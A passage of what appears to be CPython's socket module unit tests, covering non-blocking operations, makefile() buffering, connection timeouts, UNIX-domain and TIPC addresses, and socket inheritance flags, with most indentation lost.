def _testInitNonBlocking(self):
pass
def testInheritFlags(self):
# Issue #7995: when calling accept() on a listening socket with a
# timeout, the resulting socket should not be non-blocking.
self.serv.settimeout(10)
try:
conn, addr = self.serv.accept()
message = conn.recv(len(MSG))
finally:
conn.close()
self.serv.settimeout(None)
def _testInheritFlags(self):
time.sleep(0.1)
self.cli.connect((HOST, self.port))
time.sleep(0.5)
self.cli.send(MSG)
def testAccept(self):
# Testing non-blocking accept
self.serv.setblocking(0)
try:
conn, addr = self.serv.accept()
except OSError:
pass
else:
self.fail("Error trying to do non-blocking accept.")
read, write, err = select.select([self.serv], [], [])
if self.serv in read:
conn, addr = self.serv.accept()
self.assertIsNone(conn.gettimeout())
conn.close()
else:
self.fail("Error trying to do accept after select.")
def _testAccept(self):
time.sleep(0.1)
self.cli.connect((HOST, self.port))
def testConnect(self):
# Testing non-blocking connect
conn, addr = self.serv.accept()
conn.close()
def _testConnect(self):
self.cli.settimeout(10)
self.cli.connect((HOST, self.port))
def testRecv(self):
# Testing non-blocking recv
conn, addr = self.serv.accept()
conn.setblocking(0)
try:
msg = conn.recv(len(MSG))
except OSError:
pass
else:
self.fail("Error trying to do non-blocking recv.")
read, write, err = select.select([conn], [], [])
if conn in read:
msg = conn.recv(len(MSG))
conn.close()
self.assertEqual(msg, MSG)
else:
self.fail("Error during select call to non-blocking socket.")
def _testRecv(self):
self.cli.connect((HOST, self.port))
time.sleep(0.1)
self.cli.send(MSG)
@unittest.skipUnless(thread, 'Threading required for this test.')
class FileObjectClassTestCase(SocketConnectedTest):
"""Unit tests for the object returned by socket.makefile()
self.read_file is the io object returned by makefile() on
the client connection. You can read from this file to
get output from the server.
self.write_file is the io object returned by makefile() on the
server connection. You can write to this file to send output
to the client.
"""
bufsize = -1 # Use default buffer size
encoding = 'utf-8'
errors = 'strict'
newline = None
read_mode = 'rb'
read_msg = MSG
write_mode = 'wb'
write_msg = MSG
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def setUp(self):
self.evt1, self.evt2, self.serv_finished, self.cli_finished = [
threading.Event() for i in range(4)]
SocketConnectedTest.setUp(self)
self.read_file = self.cli_conn.makefile(
self.read_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def tearDown(self):
self.serv_finished.set()
self.read_file.close()
self.assertTrue(self.read_file.closed)
self.read_file = None
SocketConnectedTest.tearDown(self)
def clientSetUp(self):
SocketConnectedTest.clientSetUp(self)
self.write_file = self.serv_conn.makefile(
self.write_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def clientTearDown(self):
self.cli_finished.set()
self.write_file.close()
self.assertTrue(self.write_file.closed)
self.write_file = None
SocketConnectedTest.clientTearDown(self)
def testReadAfterTimeout(self):
# Issue #7322: A file object must disallow further reads
# after a timeout has occurred.
self.cli_conn.settimeout(1)
self.read_file.read(3)
# First read raises a timeout
self.assertRaises(socket.timeout, self.read_file.read, 1)
# Second read is disallowed
with self.assertRaises(OSError) as ctx:
self.read_file.read(1)
self.assertIn("cannot read from timed out object", str(ctx.exception))
def _testReadAfterTimeout(self):
self.write_file.write(self.write_msg[0:3])
self.write_file.flush()
self.serv_finished.wait()
def testSmallRead(self):
# Performing small file read test
first_seg = self.read_file.read(len(self.read_msg)-3)
second_seg = self.read_file.read(3)
msg = first_seg + second_seg
self.assertEqual(msg, self.read_msg)
def _testSmallRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testFullRead(self):
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testFullRead(self):
self.write_file.write(self.write_msg)
self.write_file.close()
def testUnbufferedRead(self):
# Performing unbuffered file read test
buf = type(self.read_msg)()
while 1:
char = self.read_file.read(1)
if not char:
break
buf += char
self.assertEqual(buf, self.read_msg)
def _testUnbufferedRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testReadline(self):
# Performing file readline test
line = self.read_file.readline()
self.assertEqual(line, self.read_msg)
def _testReadline(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testCloseAfterMakefile(self):
# The file returned by makefile should keep the socket open.
self.cli_conn.close()
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testCloseAfterMakefile(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileAfterMakefileClose(self):
self.read_file.close()
msg = self.cli_conn.recv(len(MSG))
if isinstance(self.read_msg, str):
msg = msg.decode()
self.assertEqual(msg, self.read_msg)
def _testMakefileAfterMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testClosedAttr(self):
self.assertTrue(not self.read_file.closed)
def _testClosedAttr(self):
self.assertTrue(not self.write_file.closed)
def testAttributes(self):
self.assertEqual(self.read_file.mode, self.read_mode)
self.assertEqual(self.read_file.name, self.cli_conn.fileno())
def _testAttributes(self):
self.assertEqual(self.write_file.mode, self.write_mode)
self.assertEqual(self.write_file.name, self.serv_conn.fileno())
def testRealClose(self):
self.read_file.close()
self.assertRaises(ValueError, self.read_file.fileno)
self.cli_conn.close()
self.assertRaises(OSError, self.cli_conn.getsockname)
def _testRealClose(self):
pass
class UnbufferedFileObjectClassTestCase(FileObjectClassTestCase):
"""Repeat the tests from FileObjectClassTestCase with bufsize==0.
In this case (and in this case only), it should be possible to
create a file object, read a line from it, create another file
object, read another line from it, without loss of data in the
first file object's buffer. Note that http.client relies on this
when reading multiple requests from the same socket."""
bufsize = 0 # Use unbuffered mode
def testUnbufferedReadline(self):
# Read a line, create a new file object, read another line with it
line = self.read_file.readline() # first line
self.assertEqual(line, b"A. " + self.write_msg) # first line
self.read_file = self.cli_conn.makefile('rb', 0)
line = self.read_file.readline() # second line
self.assertEqual(line, b"B. " + self.write_msg) # second line
def _testUnbufferedReadline(self):
self.write_file.write(b"A. " + self.write_msg)
self.write_file.write(b"B. " + self.write_msg)
self.write_file.flush()
def testMakefileClose(self):
# The file returned by makefile should keep the socket open...
self.cli_conn.close()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, self.read_msg)
# ...until the file is itself closed
self.read_file.close()
self.assertRaises(OSError, self.cli_conn.recv, 1024)
def _testMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileCloseSocketDestroy(self):
refcount_before = sys.getrefcount(self.cli_conn)
self.read_file.close()
refcount_after = sys.getrefcount(self.cli_conn)
self.assertEqual(refcount_before - 1, refcount_after)
def _testMakefileCloseSocketDestroy(self):
pass
# Non-blocking ops
# NOTE: to set `read_file` as non-blocking, we must call
# `cli_conn.setblocking` and vice-versa (see setUp / clientSetUp).
def testSmallReadNonBlocking(self):
self.cli_conn.setblocking(False)
self.assertEqual(self.read_file.readinto(bytearray(10)), None)
self.assertEqual(self.read_file.read(len(self.read_msg) - 3), None)
self.evt1.set()
self.evt2.wait(1.0)
first_seg = self.read_file.read(len(self.read_msg) - 3)
if first_seg is None:
# Data not arrived (can happen under Windows), wait a bit
time.sleep(0.5)
first_seg = self.read_file.read(len(self.read_msg) - 3)
buf = bytearray(10)
n = self.read_file.readinto(buf)
self.assertEqual(n, 3)
msg = first_seg + buf[:n]
self.assertEqual(msg, self.read_msg)
self.assertEqual(self.read_file.readinto(bytearray(16)), None)
self.assertEqual(self.read_file.read(1), None)
def _testSmallReadNonBlocking(self):
self.evt1.wait(1.0)
self.write_file.write(self.write_msg)
self.write_file.flush()
self.evt2.set()
        # Avoid closing the socket before the server test has finished,
# otherwise system recv() will return 0 instead of EWOULDBLOCK.
self.serv_finished.wait(5.0)
def testWriteNonBlocking(self):
self.cli_finished.wait(5.0)
# The client thread can't skip directly - the SkipTest exception
# would appear as a failure.
if self.serv_skipped:
self.skipTest(self.serv_skipped)
def _testWriteNonBlocking(self):
self.serv_skipped = None
self.serv_conn.setblocking(False)
# Try to saturate the socket buffer pipe with repeated large writes.
BIG = b"x" * support.SOCK_MAX_SIZE
LIMIT = 10
# The first write() succeeds since a chunk of data can be buffered
n = self.write_file.write(BIG)
self.assertGreater(n, 0)
for i in range(LIMIT):
n = self.write_file.write(BIG)
if n is None:
# Succeeded
break
self.assertGreater(n, 0)
else:
# Let us know that this test didn't manage to establish
# the expected conditions. This is not a failure in itself but,
# if it happens repeatedly, the test should be fixed.
self.serv_skipped = "failed to saturate the socket buffer"
class LineBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 1 # Default-buffered for reading; line-buffered for writing
class SmallBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 2 # Exercise the buffering code
class UnicodeReadFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'wb'
write_msg = MSG
newline = ''
class UnicodeWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'rb'
read_msg = MSG
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class UnicodeReadWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class NetworkConnectionTest(object):
"""Prove network connection."""
def clientSetUp(self):
# We're inherited below by BasicTCPTest2, which also inherits
# BasicTCPTest, which defines self.port referenced below.
self.cli = socket.create_connection((HOST, self.port))
self.serv_conn = self.cli
class BasicTCPTest2(NetworkConnectionTest, BasicTCPTest):
"""Tests that NetworkConnection does not break existing TCP functionality.
"""
class NetworkConnectionNoServer(unittest.TestCase):
class MockSocket(socket.socket):
def connect(self, *args):
raise socket.timeout('timed out')
@contextlib.contextmanager
def mocked_socket_module(self):
"""Return a socket which times out on connect"""
old_socket = socket.socket
socket.socket = self.MockSocket
try:
yield
finally:
socket.socket = old_socket
def test_connect(self):
port = support.find_unused_port()
cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(cli.close)
with self.assertRaises(OSError) as cm:
cli.connect((HOST, port))
self.assertEqual(cm.exception.errno, errno.ECONNREFUSED)
def test_create_connection(self):
# Issue #9792: errors raised by create_connection() should have
# a proper errno attribute.
port = support.find_unused_port()
with self.assertRaises(OSError) as cm:
socket.create_connection((HOST, port))
# Issue #16257: create_connection() calls getaddrinfo() against
# 'localhost'. This may result in an IPV6 addr being returned
# as well as an IPV4 one:
# >>> socket.getaddrinfo('localhost', port, 0, SOCK_STREAM)
# >>> [(2, 2, 0, '', ('127.0.0.1', 41230)),
# (26, 2, 0, '', ('::1', 41230, 0, 0))]
#
# create_connection() enumerates through all the addresses returned
# and if it doesn't successfully bind to any of them, it propagates
# the last exception it encountered.
#
# On Solaris, ENETUNREACH is returned in this circumstance instead
# of ECONNREFUSED. So, if that errno exists, add it to our list of
# expected errnos.
expected_errnos = [ errno.ECONNREFUSED, ]
if hasattr(errno, 'ENETUNREACH'):
expected_errnos.append(errno.ENETUNREACH)
self.assertIn(cm.exception.errno, expected_errnos)
def test_create_connection_timeout(self):
# Issue #9792: create_connection() should not recast timeout errors
# as generic socket errors.
with self.mocked_socket_module():
with self.assertRaises(socket.timeout):
socket.create_connection((HOST, 1234))
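
# Minimal sketch (hypothetical helper, not part of the test suite) of the
# enumerate-and-propagate behaviour described in test_create_connection
# above: try every address returned by getaddrinfo() and, if none of them
# works, re-raise the last error encountered.
def _demo_connect_any(host, port):
    import socket
    last_err = None
    for family, sock_type, proto, _canonname, sockaddr in socket.getaddrinfo(
            host, port, 0, socket.SOCK_STREAM):
        sock = socket.socket(family, sock_type, proto)
        try:
            sock.connect(sockaddr)
            return sock                  # first address that works wins
        except OSError as err:
            last_err = err
            sock.close()
    if last_err is None:
        raise OSError("getaddrinfo returned no addresses")
    raise last_err
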
@unittest.skipUnless(thread, 'Threading required for this test.')
class NetworkConnectionAttributesTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.source_port = support.find_unused_port()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def _justAccept(self):
conn, addr = self.serv.accept()
conn.close()
testFamily = _justAccept
def _testFamily(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.family, 2)
testSourceAddress = _justAccept
def _testSourceAddress(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30,
source_address=('', self.source_port))
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.getsockname()[1], self.source_port)
# The port number being used is sufficient to show that the bind()
# call happened.
testTimeoutDefault = _justAccept
def _testTimeoutDefault(self):
# passing no explicit timeout uses socket's global default
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(42)
try:
self.cli = socket.create_connection((HOST, self.port))
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), 42)
testTimeoutNone = _justAccept
def _testTimeoutNone(self):
# None timeout means the same as sock.settimeout(None)
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
self.cli = socket.create_connection((HOST, self.port), timeout=None)
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), None)
testTimeoutValueNamed = _justAccept
def _testTimeoutValueNamed(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.assertEqual(self.cli.gettimeout(), 30)
testTimeoutValueNonamed = _justAccept
def _testTimeoutValueNonamed(self):
self.cli = socket.create_connection((HOST, self.port), 30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.gettimeout(), 30)
@unittest.skipUnless(thread, 'Threading required for this test.')
class NetworkConnectionBehaviourTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def testInsideTimeout(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
time.sleep(3)
conn.send(b"done!")
testOutsideTimeout = testInsideTimeout
def _testInsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port))
data = sock.recv(5)
self.assertEqual(data, b"done!")
def _testOutsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port), timeout=1)
self.assertRaises(socket.timeout, lambda: sock.recv(5))
class TCPTimeoutTest(SocketTCPTest):
def testTCPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.accept()
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (TCP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of error (TCP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (TCP)")
if not ok:
self.fail("accept() returned success when we did not expect it")
@unittest.skipUnless(hasattr(signal, 'alarm'),
'test needs signal.alarm()')
def testInterruptedTimeout(self):
# XXX I don't know how to do this test on MSWindows or any other
        # platform that doesn't support signal.alarm() or os.kill(), though
# the bug should have existed on all platforms.
self.serv.settimeout(5.0) # must be longer than alarm
class Alarm(Exception):
pass
def alarm_handler(signal, frame):
raise Alarm
old_alarm = signal.signal(signal.SIGALRM, alarm_handler)
try:
signal.alarm(2) # POSIX allows alarm to be up to 1 second early
try:
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of Alarm")
except Alarm:
pass
except:
self.fail("caught other exception instead of Alarm:"
" %s(%s):\n%s" %
(sys.exc_info()[:2] + (traceback.format_exc(),)))
else:
self.fail("nothing caught")
finally:
signal.alarm(0) # shut off alarm
except Alarm:
self.fail("got Alarm in wrong place")
finally:
# no alarm can be pending. Safe to restore old handler.
signal.signal(signal.SIGALRM, old_alarm)
class UDPTimeoutTest(SocketUDPTest):
def testUDPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.recv(1024)
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (UDP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.recv(1024)
except socket.timeout:
self.fail("caught timeout instead of error (UDP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (UDP)")
if not ok:
self.fail("recv() returned success when we did not expect it")
class TestExceptions(unittest.TestCase):
def testExceptionTree(self):
self.assertTrue(issubclass(OSError, Exception))
self.assertTrue(issubclass(socket.herror, OSError))
self.assertTrue(issubclass(socket.gaierror, OSError))
self.assertTrue(issubclass(socket.timeout, OSError))
@unittest.skipUnless(sys.platform == 'linux', 'Linux specific test')
class TestLinuxAbstractNamespace(unittest.TestCase):
UNIX_PATH_MAX = 108
def testLinuxAbstractNamespace(self):
address = b"\x00python-test-hello\x00\xff"
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s1:
s1.bind(address)
s1.listen()
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s2:
s2.connect(s1.getsockname())
with s1.accept()[0] as s3:
self.assertEqual(s1.getsockname(), address)
self.assertEqual(s2.getpeername(), address)
def testMaxName(self):
address = b"\x00" + b"h" * (self.UNIX_PATH_MAX - 1)
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(address)
self.assertEqual(s.getsockname(), address)
def testNameOverflow(self):
address = "\x00" + "h" * self.UNIX_PATH_MAX
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
self.assertRaises(OSError, s.bind, address)
def testStrName(self):
# Check that an abstract name can be passed as a string.
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
s.bind("\x00python\x00test\x00")
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
finally:
s.close()
def testBytearrayName(self):
# Check that an abstract name can be passed as a bytearray.
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(bytearray(b"\x00python\x00test\x00"))
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'test needs socket.AF_UNIX')
class TestUnixDomain(unittest.TestCase):
def setUp(self):
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
def tearDown(self):
self.sock.close()
def encoded(self, path):
# Return the given path encoded in the file system encoding,
# or skip the test if this is not possible.
try:
return os.fsencode(path)
except UnicodeEncodeError:
self.skipTest(
"Pathname {0!a} cannot be represented in file "
"system encoding {1!r}".format(
path, sys.getfilesystemencoding()))
def bind(self, sock, path):
# Bind the socket
try:
sock.bind(path)
except OSError as e:
if str(e) == "AF_UNIX path too long":
self.skipTest(
"Pathname {0!a} is too long to serve as an AF_UNIX path"
.format(path))
else:
raise
def testStrAddr(self):
# Test binding to and retrieving a normal string pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testBytesAddr(self):
# Test binding to a bytes pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, self.encoded(path))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testSurrogateescapeBind(self):
# Test binding to a valid non-ASCII pathname, with the
# non-ASCII bytes supplied using surrogateescape encoding.
path = os.path.abspath(support.TESTFN_UNICODE)
b = self.encoded(path)
self.bind(self.sock, b.decode("ascii", "surrogateescape"))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testUnencodableAddr(self):
# Test binding to a pathname that cannot be encoded in the
# file system encoding.
if support.TESTFN_UNENCODABLE is None:
self.skipTest("No unencodable filename available")
path = os.path.abspath(support.TESTFN_UNENCODABLE)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
@unittest.skipUnless(thread, 'Threading required for this test.')
class BufferIOTest(SocketConnectedTest):
"""
Test the buffer versions of socket.recv() and socket.send().
"""
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecvIntoArray(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvIntoBytearray(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoBytearray = _testRecvIntoArray
def testRecvIntoMemoryview(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoMemoryview = _testRecvIntoArray
def testRecvFromIntoArray(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvFromIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvFromIntoBytearray(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoBytearray = _testRecvFromIntoArray
def testRecvFromIntoMemoryview(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoMemoryview = _testRecvFromIntoArray
def testRecvFromIntoSmallBuffer(self):
# See issue #20246.
buf = bytearray(8)
self.assertRaises(ValueError, self.cli_conn.recvfrom_into, buf, 1024)
def _testRecvFromIntoSmallBuffer(self):
self.serv_conn.send(MSG)
def testRecvFromIntoEmptyBuffer(self):
buf = bytearray()
self.cli_conn.recvfrom_into(buf)
self.cli_conn.recvfrom_into(buf, 0)
_testRecvFromIntoEmptyBuffer = _testRecvFromIntoArray
TIPC_STYPE = 2000
TIPC_LOWER = 200
TIPC_UPPER = 210
def isTipcAvailable():
"""Check if the TIPC module is loaded
The TIPC module is not loaded automatically on Ubuntu and probably
other Linux distros.
"""
if not hasattr(socket, "AF_TIPC"):
return False
if not os.path.isfile("/proc/modules"):
return False
with open("/proc/modules") as f:
for line in f:
if line.startswith("tipc "):
return True
return False
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCTest(unittest.TestCase):
def testRDM(self):
srv = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
cli = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
self.addCleanup(srv.close)
self.addCleanup(cli.close)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
srv.bind(srvaddr)
sendaddr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
cli.sendto(MSG, sendaddr)
msg, recvaddr = srv.recvfrom(1024)
self.assertEqual(cli.getsockname(), recvaddr)
self.assertEqual(msg, MSG)
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCThreadableTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName = 'runTest'):
unittest.TestCase.__init__(self, methodName = methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.srv = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.srv.close)
self.srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
self.srv.bind(srvaddr)
self.srv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.srv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
        # There is a hittable race between serverExplicitReady() and the
# accept() call; sleep a little while to avoid it, otherwise
# we could get an exception
time.sleep(0.1)
self.cli = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
addr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
self.cli.connect(addr)
self.cliaddr = self.cli.getsockname()
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
self.assertEqual(self.cliaddr, self.connaddr)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
@unittest.skipUnless(thread, 'Threading required for this test.')
class ContextManagersTest(ThreadedTCPSocketTest):
def _testSocketClass(self):
# base test
with socket.socket() as sock:
self.assertFalse(sock._closed)
self.assertTrue(sock._closed)
# close inside with block
with socket.socket() as sock:
sock.close()
self.assertTrue(sock._closed)
# exception inside with block
with socket.socket() as sock:
self.assertRaises(OSError, sock.sendall, b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionBase(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionBase(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
self.assertFalse(sock._closed)
sock.sendall(b'foo')
self.assertEqual(sock.recv(1024), b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionClose(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionClose(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
sock.close()
self.assertTrue(sock._closed)
self.assertRaises(OSError, sock.sendall, b'foo')
class InheritanceTest(unittest.TestCase):
@unittest.skipUnless(hasattr(socket, "SOCK_CLOEXEC"),
"SOCK_CLOEXEC not defined")
@support.requires_linux_version(2, 6, 28)
def test_SOCK_CLOEXEC(self):
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_CLOEXEC) as s:
self.assertTrue(s.type & socket.SOCK_CLOEXEC)
self.assertFalse(s.get_inheritable())
def test_default_inheritable(self):
sock = socket.socket()
with sock:
self.assertEqual(sock.get_inheritable(), False)
def test_dup(self):
sock = socket.socket()
with sock:
newsock = sock.dup()
sock.close()
with newsock:
self.assertEqual(newsock.get_inheritable(), False)
def test_set_inheritable(self):
sock = socket.socket()
with sock:
sock.set_inheritable(True)
self.assertEqual(sock.get_inheritable(), True)
sock.set_inheritable(False)
self.assertEqual(sock.get_inheritable(), False)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_get_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(sock.get_inheritable(), False)
# clear FD_CLOEXEC flag
flags = fcntl.fcntl(fd, fcntl.F_GETFD)
flags &= ~fcntl.FD_CLOEXEC
fcntl.fcntl(fd, fcntl.F_SETFD, flags)
self.assertEqual(sock.get_inheritable(), True)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_set_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
fcntl.FD_CLOEXEC)
sock.set_inheritable(True)
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
0)
@unittest.skipUnless(hasattr(socket, "socketpair"),
"need socket.socketpair()")
def test_socketpair(self):
s1, s2 = socket.socketpair()
self.addCleanup(s1.close)
self.addCleanup(s2.close)
self.assertEqual(s1.get_inheritable(), False)
self.assertEqual(s2.get_inheritable(), False)
@unittest.skipUnless(hasattr(socket, "SOCK_NONBLOCK"),
"SOCK_NONBLOCK not defined")
class NonblockConstantTest(unittest.TestCase):
def checkNonblock(self, s, nonblock=True, timeout=0.0):
if nonblock:
self.assertTrue(s.type & socket.SOCK_NONBLOCK)
self.assertEqual(s.gettimeout(), timeout)
else:
self.assertFalse(s.type & socket.SOCK_NONBLOCK)
self.assertEqual(s.gettimeout(), None)
@support.requires_linux_version(2, 6, 28)
def test_SOCK_NONBLOCK(self):
# a lot of it seems silly and redundant, but I wanted to test that
# changing back and forth worked ok
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_NONBLOCK) as s:
self.checkNonblock(s)
s.setblocking(1)
self.checkNonblock(s, False)
s.setblocking(0)
self.checkNonblock(s)
s.settimeout(None)
self.checkNonblock(s, False)
s.settimeout(2.0)
self.checkNonblock(s, timeout=2.0)
s.setblocking(1)
self.checkNonblock(s, False)
# defaulttimeout
t = socket.getdefaulttimeout()
socket.setdefaulttimeout(0.0)
with socket.socket() as s:
self.checkNonblock(s)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(2.0)
with socket.socket() as s:
self.checkNonblock(s, timeout=2.0)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(t)
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(multiprocessing, "need multiprocessing")
class TestSocketSharing(SocketTCPTest):
# This must be classmethod and not staticmethod or multiprocessing
# won't be able to bootstrap it.
@classmethod
def remoteProcessServer(cls, q):
# Recreate socket from shared data
sdata = q.get()
message = q.get()
s = socket.fromshare(sdata)
s2, c = s.accept()
# Send the message
s2.sendall(message)
s2.close()
s.close()
def testShare(self):
# Transfer the listening server socket to another process
